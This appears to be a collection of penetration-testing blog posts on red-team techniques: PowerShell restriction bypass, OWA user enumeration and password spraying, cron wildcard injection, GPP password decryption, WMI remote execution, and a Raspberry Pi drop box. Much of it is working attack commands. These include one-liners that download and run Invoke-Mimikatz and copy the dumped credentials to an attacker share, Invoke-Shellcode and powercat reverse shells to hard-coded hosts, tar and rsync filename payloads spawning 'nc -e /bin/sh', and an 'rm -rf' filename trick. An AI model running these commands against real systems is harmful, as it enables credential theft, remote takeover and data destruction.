On a recent pen test, the client had disabled PowerShell on all of the workstations. Additionally, we identified an elevated service account was sending encrypted passwords across the network, however, they also had a GPO policy that would remove our local admin every five minutes. Utilizing the System libraries in C# (System.Management.Automation), we are able to create our own “powershell.exe” without the powershell.exe, create a malicious executable, and relay it to a workstation or server.
The System.Management.Automation namespace is the root namespace for Windows PowerShell. It contains classes, enumerations, and interfaces. Using this same library, we can create and compile our own powershell.exe. Ben0xA has already done this for us with NPS.
Solution (The Dirty Way):
The solution requires appropriate enumeration to be performed on the target and the system architecture identified. Additionally, I will provide three attacks (invoke-mimikatz, invoke-shellcode, and ps1encode) and two delivery methods (SMB and HTTP). The following commands provided below are examples and can be used as bat files or compiled into executables of the architecture of the target. In the examples provided, I have created NPSx64.exe (64 bit) and NPSx86.exe (32 bit).
Compiling the Source
csc.exe /unsafe /reference:”C:\windows\assembly\GAC_MSIL\System.Management.Automation\126.96.36.199__31bf3856ad364e35\System.Management.Automation.dll” /reference:System.IO.Compression.dll /out:NPSx86.exe /platform:x86 “nps\*.cs”
csc.exe /unsafe /reference:”C:\windows\assembly\GAC_MSIL\System.Management.Automation\188.8.131.52__31bf3856ad364e35\System.Management.Automation.dll” /reference:System.IO.Compression.dll /out:NPSx64.exe /platform:x64 “nps\*.cs”
net use \\192.168.31.137\AnonShare && (if %PROCESSOR_ARCHITECTURE% == AMD64 (copy /Y \\192.168.31.137\AnonShare\NPSx64.exe C:\Users\Public\nps.exe) Else (copy /Y \\192.168.31.137\AnonShare\NPSx86.exe C:\Users\Public\nps.exe)) && ping -n 20 127.0.0.1 && cmd.exe /c START /MIN C:\Users\Public\nps.exe “IEX (New-Object Net.WebClient).DownloadString(‘\\192.168.31.137\AnonShare\ps\im.txt’); Invoke-Mimikatz -DumpCreds > c:\Users\Public\mimi.txt” && ping -n 20 127.0.0.1 && copy /Y C:\Users\Public\mimi.txt \\192.168.31.137\AnonShare\mimi.txt
Let’s break this down:
|net use \\192.168.31.137\AnonShare||Mount anonymous share on the attacker system|
|(if %PROCESSOR_ARCHITECTURE% == AMD64
(copy /Y \\192.168.31.137\AnonShare\NPSx64.exe C:\Users\Public\nps.exe) Else
(copy /Y \\192.168.31.137\AnonShare\NPSx86.exe C:\Users\Public\nps.exe))
|Determine the processor architecture and download the appropriate copy via SMB to the Public Users directory|
|ping -n 20 127.0.0.1||Wait approximately 20 seconds for the file to transfer over|
|cmd.exe /c START /MIN C:\Users\Public\nps.exe “IEX (New-Object Net.WebClient).DownloadString(‘\\192.168.31.137\AnonShare\ps\im.txt’); Invoke-Mimikatz -DumpCreds > c:\Users\Public\mimi.txt”||Execute Invoke-Mimikatz via SMB and save the output locally to the Public Users directory|
|ping -n 20 127.0.0.1||Wait approximately 20 seconds for invoke-mimikatz to finish|
|copy /Y C:\Users\Public\mimi.txt \\192.168.31.137\AnonShare\mimi.txt||Copy over the mimikatz output to our anonymous SMB share|
echo Dim xHttp: Set xHttp = CreateObject(“Microsoft.XMLHTTP”) > C:\Users\Public\nps.vbs && echo Dim bStrm: Set bStrm = CreateObject(“Adodb.Stream”) >> C:\Users\Public\nps.vbs && echo Dim WshShell >> C:\Users\Public\nps.vbs &&echo Dim WshProcEnv >> C:\Users\Public\nps.vbs &&echo Dim system_architecture >> C:\Users\Public\nps.vbs &&echo Dim process_architecture >> C:\Users\Public\nps.vbs &&echo Set WshShell = CreateObject(“WScript.Shell”) >> C:\Users\Public\nps.vbs &&echo Set WshProcEnv = WshShell.Environment(“Process”) >> C:\Users\Public\nps.vbs &&echo process_architecture= WshProcEnv(“PROCESSOR_ARCHITECTURE”) >> C:\Users\Public\nps.vbs &&echo If process_architecture = “x86” Then >> C:\Users\Public\nps.vbs &&echo xHttp.Open “GET”, “http://192.168.31.137/ps/NPSx86.exe“, False >> C:\Users\Public\nps.vbs && echo Else >> C:\Users\Public\nps.vbs &&echo xHttp.Open “GET”, “http://192.168.31.137/ps/NPSx64.exe“, False >> C:\Users\Public\nps.vbs && echo End If >> C:\Users\Public\nps.vbs && echo xHttp.Send >> C:\Users\Public\nps.vbs && echo With bStrm >> C:\Users\Public\nps.vbs && echo .Type = 1 ‘//binary >> C:\Users\Public\nps.vbs && echo .Open >> C:\Users\Public\nps.vbs && echo .write xHttp.responseBody >> C:\Users\Public\nps.vbs && echo .savetofile “C:\Users\Public\nps.exe”, 2 ‘//overwrite >> C:\Users\Public\nps.vbs && echo End With >> C:\Users\Public\nps.vbs && cmd.exe /c START /MIN cscript C:\Users\Public\nps.vbs && ping -n 20 127.0.0.1 && cmd.exe /c START /MIN C:\Users\Public\nps.exe “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.31.137/ps/is.txt’); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.31.137 -Lport 443 -force”
Let’s break this down:
|echo Dim xHttp: Set xHttp = CreateObject(“Microsoft.XMLHTTP”) > C:\Users\Public\nps.vbs
echo Dim bStrm: Set bStrm = CreateObject(“Adodb.Stream”) >> C:\Users\Public\nps.vbs
echo Dim WshShell >> C:\Users\Public\nps.vbs
echo Dim WshProcEnv >> C:\Users\Public\nps.vbs
echo Dim system_architecture >> C:\Users\Public\nps.vbs
echo Dim process_architecture >> C:\Users\Public\nps.vbs
echo Set WshShell = CreateObject(“WScript.Shell”) >> C:\Users\Public\nps.vbs
echo Set WshProcEnv = WshShell.Environment(“Process”) >> C:\Users\Public\nps.vbs
echo process_architecture= WshProcEnv(“PROCESSOR_ARCHITECTURE”) >> C:\Users\Public\nps.vbs
echo If process_architecture = “x86” Then >> C:\Users\Public\nps.vbs
echo xHttp.Open “GET”, “http://192.168.31.137/ps/NPSx86.exe“, False >> C:\Users\Public\nps.vbs
echo Else >> C:\Users\Public\nps.vbs
echo xHttp.Open “GET”, “http://192.168.31.137/ps/NPSx64.exe“, False >> C:\Users\Public\nps.vbs
echo End If >> C:\Users\Public\nps.vbs
echo xHttp.Send >> C:\Users\Public\nps.vbs
echo With bStrm >> C:\Users\Public\nps.vbs
echo .Type = 1 ‘//binary >> C:\Users\Public\nps.vbs
echo .Open >> C:\Users\Public\nps.vbs
echo .write xHttp.responseBody >> C:\Users\Public\nps.vbs
echo .savetofile “C:\Users\Public\nps.exe”, 2 ‘//overwrite >> C:\Users\Public\nps.vbs
echo End With >> C:\Users\Public\nps.vbs
|Create a VBS version of wget to determine the processor architecture and download the appropriate copy via SMB to the Public Users directory|
|cmd.exe /c START /MIN cscript C:\Users\Public\nps.vbs||Execute the VBS script|
|ping -n 20 127.0.0.1||Wait approximately 20 seconds for the download to complete to the Public User directory|
|cmd.exe /c START /MIN C:\Users\Public\nps.exe “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.31.137/ps/is.txt’); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.31.137 -Lport 443 -force”||Execute the invoke-shellcode command|
net use \\192.168.31.137\AnonShare && (if %PROCESSOR_ARCHITECTURE% == AMD64 (copy /Y \\192.168.31.137\AnonShare\NPSx64.exe C:\Users\Public\nps.exe) Else (copy /Y \\192.168.31.137\AnonShare\NPSx86.exe C:\Users\Public\nps.exe)) && ping -n 20 127.0.0.1 && cmd.exe /c START /MIN C:\Users\Public\nps.exe -encodedcommand OUTPUT_FROM_PS1ENCODE
See above for a description of the command.
echo Dim xHttp: Set xHttp = CreateObject(“Microsoft.XMLHTTP”) > C:\Users\Public\nps.vbs && echo Dim bStrm: Set bStrm = CreateObject(“Adodb.Stream”) >> C:\Users\Public\nps.vbs && echo Dim WshShell >> C:\Users\Public\nps.vbs &&echo Dim WshProcEnv >> C:\Users\Public\nps.vbs &&echo Dim system_architecture >> C:\Users\Public\nps.vbs &&echo Dim process_architecture >> C:\Users\Public\nps.vbs &&echo Set WshShell = CreateObject(“WScript.Shell”) >> C:\Users\Public\nps.vbs &&echo Set WshProcEnv = WshShell.Environment(“Process”) >> C:\Users\Public\nps.vbs &&echo process_architecture= WshProcEnv(“PROCESSOR_ARCHITECTURE”) >> C:\Users\Public\nps.vbs &&echo If process_architecture = “x86” Then >> C:\Users\Public\nps.vbs &&echo xHttp.Open “GET”, “http://192.168.31.137/ps/NPSx86.exe“, False >> C:\Users\Public\nps.vbs && echo Else >> C:\Users\Public\nps.vbs &&echo xHttp.Open “GET”, “http://192.168.31.137/ps/NPSx64.exe“, False >> C:\Users\Public\nps.vbs && echo End If >> C:\Users\Public\nps.vbs && echo xHttp.Send >> C:\Users\Public\nps.vbs && echo With bStrm >> C:\Users\Public\nps.vbs && echo .Type = 1 ‘//binary >> C:\Users\Public\nps.vbs && echo .Open >> C:\Users\Public\nps.vbs && echo .write xHttp.responseBody >> C:\Users\Public\nps.vbs && echo .savetofile “C:\Users\Public\nps.exe”, 2 ‘//overwrite >> C:\Users\Public\nps.vbs && echo End With >> C:\Users\Public\nps.vbs && cmd.exe /c START /MIN cscript C:\Users\Public\nps.vbs && ping -n 20 127.0.0.1 && cmd.exe /c START /MIN C:\Users\Public\nps.exe -encodedcommand OUTPUT_FROM_PS1ENCODE
See above for a description of the command.
PART 2 COMING SOON
Outside of recon-ng and theharvester, I could not find any well documented user name enumeration techniques. I did find a blog post here and there about brute forcing passwords and possible username enumeration, but nothing complete and in one location. The goal here is to enumerate the domain, usernames, possible passwords, and whether multi-factor authentication is enabled on an exposed Microsoft OWA server.
Determining the Version of Exchange
The table below should be used as a reference to determine the current version of Exchange.
Determining the Domain
Using Burp proxy, we should attempt to access the following URIs, when prompted, just enter a user/pass of test/test:
Take note of the Request, we should see something along the lines of “Authorization: NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw==”
Next, navigate to the Response tab, and take note of the WWW-Authenticate: NTLM response:
Copy that long NTLM response and now navigate to the Decoder tab and paste it in and select Decode as Base64. In the new box underneath select the Text radio button. And look what we have here…
Here is a breakdown of the information:
1: Domain: N…..1
2: Server: …..Exchange01
3: FQDN: n…..1.com
My favorite list of usernames is the US Census list, first initial and last name. Making a copy of that user list, we need to append the domain name to the beginning of each user. In this example I will be using a smaller user list.
To append the domain to the beginning of each line:
sed -e ‘s/^/domain\\/’ userfile.txt > newuserfile.txt
Now that we have our userlist, enable Interceptor and navigate to the OWA login page and enter dummy credentials. Proceed to the Proxy tab and right Click and select Send to Intruder.
Select the Intruder tab, the new tab that opened 1/2/3/…, then Positions. Select Clear, to clear out the variables, then highlight the username entered (next to the username= variable) and select Add. I also changed the password= to Summer2016, for a quick password guess against all usernames.
Select the Payloads tab, load in our userlist, and select Start Attack.
NOTE: In the Options tab, you can configure the threads, number of retries, pause between retries, and my favorite grep (you can grep for success or failure responses).
Once the attack has finished, click on the Results tab and sort by Response Completed. Notice the drastic differences in the times (This is known as a timing attack)? The accounts that take a longer time to respond are invalid accounts.
In the example, the following accounts with lower response times are valid and was confirmed during post exploit.
Once we have a list of valid accounts, we can make a new userlist with only valid accounts and continue with our password guessing. I recommend only performing two password guesses a day, but you should always confirm with your POC how many guesses are allowed before an account is locked out. A successful password guess would have a different size response length due to the fact that a successful login page would have different content, other than an invalid username/password returned.
Determining if Multi-factor is Enabled (Courtesy of Black Hills Security)
Microsoft Multi-Factor Authentication (MFA) requires users to acknowledge a phone call or a text message before granting access to the resource. After correct credentials are entered, the server waits for the user to verify the attempt (by pressing “#” on the phone call they receive for example). This is awesome from a security perspective; however, Microsoft still gives away whether the password is correct in its server response to valid credentials. The response is only slightly different but it is enough to determine if a password is valid or invalid.
|Valid/Invalid Passwords||Response Received|
Note the extra “auth.owa” in the response URI.
NOTE: When executing this attack, the user will receive a text or phone call with the multifactor indicated.
While hacking a boot2root, I was able to compromise a webserver and gain access to the www-data account. My normal privilege escalation tricks were not working, there were no misconfigured services or cron jobs running as root that I could modify. Running uname or viewing /etc/issue came up with a modified Linux version that I could not use to determine the accurate kernel version. Access to sensitive files, root, and home directories also provided no success. While browsing the cron jobs, it was determined that there was a script file that executed as root, although I could not modify this script, I could read the file and I identified a simple script that archives the web directory by using a wildcard (*).
A wildcard is a character, or set of characters that can be used as a replacement for some range/class of characters. Wildcards are interpreted by shell before any other action is taken.
Some Shell Wildcards:
* An asterisk matches any number of characters in a filename, including none.
? The question mark matches any single character.
[ ] Brackets enclose a set of characters, any one of which may match a single character at that position.
– A hyphen used within [ ] denotes a range of characters.
~ A tilde at the beginning of a word expands to the name of your home directory. If you append another user’s login name to the character, it refers to that user’s home directory.
Basic example of wildcards usage:
# ls *.php – List all files with PHP extension
# rm *.gz – Delete all GZIP files
# cat backup* – Show content of all files which name is beginning with ‘backup’ string
# ls test? – List all files whose name is beginning with string ‘test’ and has exactly one additional character
So Where Is The Problem? I Use Wildcards All The Time
When using shell wildcards, especially asterisk (*), Unix shell will interpret files beginning with hyphen (-) character as command line arguments to executed command/program. That leaves space for variation of classic channeling attack. Channeling problem will arise when different kind of information channels are combined into single channel. Practical cases in this technique is combining arguments and filenames, as different “channels” into a single command execution, because of using shell wildcards. Don’t understand? That’s ok, just keep reading on.
So How Can We Weaponize This?
Below are some of the common commands that we would find in scripts or cron jobs that are executed by administrators.
NOTE: This attacks require write access to the directory.
By adding a filename ‘-rf’ we can recursively delete all files and directories should an ‘rm *’ command is executed.
|File Names Required:||-rf|
|Executed Command:||rm *|
|Actual Command Executed:||rm * -rf|
By adding a reference file (.drf.txt) and a file named –reference=.drf.txt we are able to overwrite the specified owner when the chown command is executed with a wildcard.
File Names Required:
|Executed Command:||chown -R nobody:nobody *.txt|
|Actual Command Executed:||chown -R nobody:nobody *.txt –reference=.drf.txt|
We can also create a symbolic link in that directory that points to /etc/shadow and the ownership of /etc/shadow would also be changed
All your base are belong to us!
chmod works the same way as chown, using the same filenames. By adding a reference file .drf.txt and making it world read/write/execute, we can copy those permissions to the files covered under the wildcard. In this example we also added a file name ‘-R’ for some recursive action.
|File Names Required:||.drf.txt|
|Executed Command:||chmod 000 *|
|Actual Command Executed:||chmod 000 * -R –reference=.drf.txt|
tar is a tool for archiving files and is commonly found in cron jobs. Using tar, we can perform command execution and create a reverse shell back to our attacker.
|File Names Required:||–checkpoint=1|
nc 127.0.0.1 80 -e /bin/sh
|Executed Command:||tar cf archive.tar *|
|Actual Command Executed:||tar cf archive.tar * –checkpoint=1 –checkpoint-action=exec=sh shell.sh|
rsync is a remote copy tool that is often used in cron jobs as well. Rsync can execute commands by using the ‘-e’ flag.
|File Names Required:||-e sh shell.txt|
nc 127.0.0.1 80 -e /bin/sh
|Executed Command:||rsync –t *.txt foo:src/|
|Actual Command Executed:||rsync –t *.txt -e sh shell.txt foo:src/|
On my last engagement, the client network was hardened pretty well. The typical escalation path of sniffing the network, anonymous enumeration, and kerb guessing was not providing any results. After some enumeration it was determined that the systems were fully patched and default passwords were changed on all of the web servers…except for the printers.
Once access to the administrator console for the printer was gained, it was determined that the printer was configured to save documents to a network share. Using the developers tools built into Firefox, we were able to debug the running application to view the network password for the account used to save the scanned documents to the network share.
NOTE: Other alternatives include using the FireBug plugin, or configuring the network share to point to a rogue SMB server to capture the password hash.
Once a valid user account was found for the client domain, we now have read access to the domain controller and policies. After mounting the sysvol directory on the domain controller, a quick search found a groups.xml file and the client has configured the local administrator password through Group Policy Preferences. With access to the cpassword value, we can now decrypt the value to obtain the local administrator password.
Microsoft has released a security advisory in regards to the escalation of privileges through group policy preferences: https://support.microsoft.com/en-us/kb/2962486
Once the local administrator account and password was obtained, it was tested against the Windows devices within the network. Using WMI and powershell, a workstation where a domain administrator was located and mimikatz was executed allowing access to their cleartext passwords stored in memory. For more information on using WMI and powershell, see my previous blog post WMI Still Using PSEXEC.
COMMANDS (Once a valid user account has been found):
C:\> net use \\<DOMAIN_CONTROLLER>\sysvol /u:<DOMAIN>\<USERNAME> <PASSWORD>
C:\> dir /b /s \\<DOMAIN_CONTROLLER>\sysvol\groups.xml
C:\>type \\<DOMAIN_CONTROLLER>\sysvol\<PATH\TO>\Groups.xml | find /i “cpassword”
# ruby gpp_extract.rb -e <CPASSWORD_VALUE>
Powershell has become the go to scripting language for both red teams and blue teams with its versatile .net and windows API connections. It has also become standard in many third party applications making it difficult to disable on Windows devices without the possibility of breaking functionality. If a client does disable or blacklist the powershell.exe, we can easily bypass that by making our own powershell executable using Ben0xA’s AwesomerShell.
Recently a new module for metasploit has been introduced that allows an attacker to import, execute, or drop into a powershell shell. As of the time of this blog, the import functionality is not included with the repository version of metasploit. To include this functionality, perform the following:
mv /usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb /usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb.orig
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/04caa9affdeda5ee083e2d2e85d1a3d7a88f8393/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb -O /usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb
mv /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/powershell/powershell.rb /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/powershell/powershell.rb.orig
wget https://raw.githubusercontent.com/OJ/metasploit-framework/ce8a6f57a004987d21c1bd672e362304dd440f16/lib/rex/post/meterpreter/extensions/powershell/powershell.rb -O /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/powershell/powershell.rb
mv /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/powershell/tlv.rb /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/powershell/tlv.rb.orig
wget https://raw.githubusercontent.com/OJ/metasploit-framework/ce8a6f57a004987d21c1bd672e362304dd440f16/lib/rex/post/meterpreter/extensions/powershell/tlv.rb -O /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/powershell/tlv.rb
Powershell Reverse Handler
Prior to this module, in order to get an interactive powershell session, you needed to inject a powershell payload. This could be an issue if you already have a shell and would like a powershell shell, especially if you have an ongoing social engineering campaign and can’t shutdown your handler, now you need to rely on another outbound port being opened. In order to execute a reverse powershell we can do the following (Note, this assumes the workstation is already compromised by other means):
run multi_meter_inject -pt windows/powershell_reverse_tcp -mr 10.5.10.71 -p 8080
Alternative Powershell Module
Going back to our original session, we can now perform a “load powershell” to load the powershell module and view the help files.
Dropping down to a shell we can execute some quick powershell commands to help with our recon.
powershell_import / powershell_execute
With the option to download and execute powershell scripts in memory, we can run the majority of powersploit, powerpen, powerup scripts, however having the option to import and execute allows us red teamers another option to execute custom scripts.
powershell_execute “powershell_function -arg 1 -arg 2“
So it has been a few months since I last picked up my raspberry pi to continue on my mission of creating an ultimate dropbox tool for my arsenal. Of course I could always just buy a PWNplug and call it a day but then I can’t have any fun designing and implementing a hardware hack! Last time we left off and I had created a Raspberry PI dropbox script which would make it easy to create a dropbox that phones home via SSH or creates a wireless access point to connect to. I have since updated the script for the following:
In addition to the changes to the deployable script mentioned above, I found some old hardware laying around including an old APC surge protector and an HP power brick. I placed the USB components within the APC power strip and the raspberry pi within the old HP power brick and attached the two devices together with some double sided tape. With some quick modifications, my device was complete.
Today, I receive an email from the Offensive Security team:
We are happy to inform you that you have successfully completed the Penetration Testing with Kali Linux certification exam and have obtained your Offensive Security Certified Professional (OSCP) certification.”
For the previous 90 days I had the chance to take one of the best penetration testing courses available today. I have read many pentest books and I perform penetration testing on a daily basis, however nothing can really prepare you for the Offensive Security Penetration Testing with Kali training course. This blog is an overview of the course and exam and what to expect.
At the time of my course time, the lab consisted of over 50 targets to attack and 4 networks to pivot into. Once connected to the lab, the student is presented with approximately 40 targets on the public network with the opportunity to pivot into a development, IT, and an administrator network. Once on those networks, the attacker is presented with more targets to further enumerate and exploit with the end goal to eventually gain access into the administrator network via pivoting from the public network through the IT network and finally into the admin network.
Overall, the course was very challenging and I often found myself over complicating the problem when the answer was right in front of me. Although the course teaches the student some basic tools used by penetration testers, it is not a designed to teach you how to use a bunch of tools like other courses. The course is setup to teach the student the proper methodology on how to become a great penetration tester and how to properly enumerate targets and the IT environment. If you are looking for a course just to teach you about the tools, this is not the course for you, however if you want to learn how to properly enumerate targets, research exploits, customize exploit code to work in your specific environment, and how to pivot from environment to environment…then this is the course for you.
Exam time…The exam consisted of 5 systems, each one with different point values depending on difficulty of exploitation. The student is not required to fully compromise a system to get points, for example, a low privilege shell/access would give the student half the points as a full compromise, however, for my exam, full compromise is required on 4/5 systems to pass the exam. The exam requires a minimum of 70 points to pass plus a penetration test report showing screenshots of the exploit, any code changes to exploits used, and a proof file located on each system under the administrator account. The report should provide enough detail to walk a user through the exploit step-by-step.
Final remarks…although this course is challenging, I would not say it is impossible, even for someone with no experience. This course and the certification will not be handed to you…you will need to put in the extra work and hours to do your own research. Additionally, there is no right or wrong way to exploit the systems in the lab or exam. I found myself exploiting some systems using different exploits or techniques as some of the students (once you pass the exam, you will be granted access into a hidden forum where students that passed the exam can discuss the techniques used to exploit systems). My advice is if you are stuck and banging your head against a wall, it will happen, take a step back and redo your enumeration. The Offensive Security team has placed numerous rabbit holes within the system that lead nowhere to trip up the students. Good luck and have fun, it is a great learning experience!
When performing social engineering or some red team engagements, some times the easiest thing to do is to just drop a device on the network and run. With Network Access Controls in place, this can sometimes be a daunting task. If you drop a device on the network there is a chance it will get flagged and moved to a guest VLAN.
As Raspberry PIs become more powerful and cheaper, creating and deploying Raspberry PIs as a valuable social engineering or red team drop box is a no brainer. With two USB NICs and a USB WIFI card (OPTIONAL USB 4G card), a Raspberry PI could easily become a common goto for a dropbox. Measuring only 7″x3″x2″, the Raspberry Pi is easily concealable in an enclosure or “power brick”. Creating the Raspberry PIs can be automated to help create multiple devices quickly.
Command line arguments:
–base = Base configuration hostname/password/ssh keys
–tft = Installs and configures TFT patched kernel
–wifi = Configure wifi AP to start on boot
–ssh = Configure ssh phone home
./raspi-config.sh –base –ssh
The –ssh changes the ssh keys (again) incase you want to redeploy a device (DO NOT SET A PASSPHRASE), asks for the main ssh server, then uploads the public key to the authorized_keys. Creates a cron script to auto ssh every 5 minutes.
./raspi-config.sh –base –wifi
The –wifi starts the pi in wifi AP mode with all NICS down, asks for SSID and WPA passphrase during configuration. While in a parking lot, an attacker can access the device, start up eth1 or eth2 with mac spoofing or start both NICs for 802.1x bypass.
To remove the auto SSH every 5 minutes, simple delete the cron job file:
To prevent the Access Point from starting at boot, delete the following line from /etc/rc.local:
Possible Future Updates
Adding a 4G modem, allowing all remote connections to never touch the corporate network. With the 4G modem it would both increase the stealth (no SSH connections out) and expand our reach (limited by wifi).
On my last pen job, I noticed the majority of the team was still using PSEXEC to remote into target systems. PSEXEC connects to the target, copies psexesvc.exe to the Admin$ share, and launches it as a temporary service. The psexesvc on the target then launches the executable specified. PSEXEC and psexesvc use pipes to handle keyboard input and screen output. Once the executable finishes, the psexesvc will terminate and remove itself from the services list, and PSEXEC will exit. PSexec style tools such as the psexec module in Metasploit, smbexec, winexe, or even the original sysinternals tool produce numerous points in the creation process that a client would be able to log and alert on PSEXEC, as well as, some A/V providers and modern defense tools such as Bit9 detect the rogue binaries on the systems alerting on the process as well.
Using WMI (Windows Management Instrumentation) provides another path to execute code and commands on remote systems without touching disk. The advantage of WMI over other methods of remote command execution is that it doesn’t rely on SMB and starting a service on the remote host. In most cases, it flies beneath the radar and it just might be the easiest way to get a shell on a remote host without writing to the disk. WMI tools on Kali have the ability to use the actual password or the hash. WMI communications use TCP port 135 and afterwards a random port is negotiated.
The following detection methods can be implemented by clients to help detect malicious WMI calls. Clients should collect and analyze the Microsoft-Windows-WinRM/Operational, Microsoft-Windows-WMI-Activity/Operational, Microsoft-Windows-DistributedCOM logs. WMI can also be permanently blocked by disabling the Winmgmt service.
WMIexec can be used to drop the attacker into a semi-interactive shell on the targets system or add a command to execute.
wmiexec.py <DOMAIN>/<USERNAME>:<PASSWORD>@<IP_ADDRESS> [command]
wmiexec.py -hashes <LMHASH:NTHASH> <DOMAIN>/<USERNAME>@<IP_ADDRESS> [command]
wmiexec.py <DOMAIN>/<USERNAME>@<IP_ADDRESS> [command]
PTH-wmic / PTH-wmis
pth-wmis -U ‘<DOMAIN>\<USERNAME>%<LMHASH:NTHASH>’ //<IP_ADDRESS> [command]
pth-wmis -U ‘<DOMAIN>\<USERNAME>%<LMHASH:NTHASH>’ //<IP_ADDRESS> “cmd.exe /c powershell.exe …”
For metasploit fanboys…
Mimikatz Dump Creds
python /toolslinux/exploits/impacket/examples/wmiexec.py -hashes <LANMAN>:<NTLM> <DOMAIN>/<USERNAME>@<IP_ADDRESS> powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://<WEB_HOST>/PowerSploit-master/Exfiltration/Invoke-Mimikatz.ps1’); Invoke-Mimikatz -DumpCreds”
Dump Local User Hashes
python /toolslinux/exploits/impacket/examples/wmiexec.py <DOMAIN>/<USERNAME>@<IP_ADDRESS> powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://<WEB_HOST>/nishang-master/Gather/Get-PassHashes.ps1’); Get-PassHashes ”
python /toolslinux/exploits/impacket/examples/wmiexec.py <DOMAIN>/<USER>@<IP_ADDRESS> powershell “-nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(‘http://<WEB_HOST>/powercat-master/powercat.ps1’); powercat -c <LISTENER> -p <PORT> -ep”
DOS Command Prompt
powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(‘http://10.32.155.36/powercat-master/powercat.ps1’); powercat -c 10.32.155.36 -p 8081 -e cmd
powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(‘http://10.32.155.36/powercat-master/powercat.ps1’); powercat -c 10.32.155.36 -p 8081 –ep
Reverse Shell & Dump DC
PS C:\> powercat –l –p 8081
The MiTM Attack Script has been updated. I removed and replaced ettercap with bettercap. I also added some new attack vectors including the following:
Some other options also include adding SSLstrip to all attacks and for picky gateways half duplex.
SSLStrip is a type of MITM attack that forces a victim’s browser into communicating with an adversary in plain-text over HTTP, and the adversary proxies the modified content from an HTTPS server. To do this, SSLStrip is “stripping” https:// URLs and turning them into http:// URLs.
Half duplex only sends arp poisoning to one target, this would be used when full poisoning is unachievable because the gateway/router would send another request to the real IP of the target asking it again for its mac address, invalidating the ARP cache of the target and fixing it. The –half-duplex command doesn’t send the second ARP packet, not spoofing the router, thus it won’t be able to detect the ARP MITM and fix the targets ARP cache.
Since we (still) don’t have active inspection/manipulation on a packet level, we don’t really need full duplex, so that’ll do the trick if you have issues with ARP poisoning on your network.”
Completely customizable options makes portability easy
Please let me know if something isn’t working correctly, this has been tested on a custom Kali 2.0 build.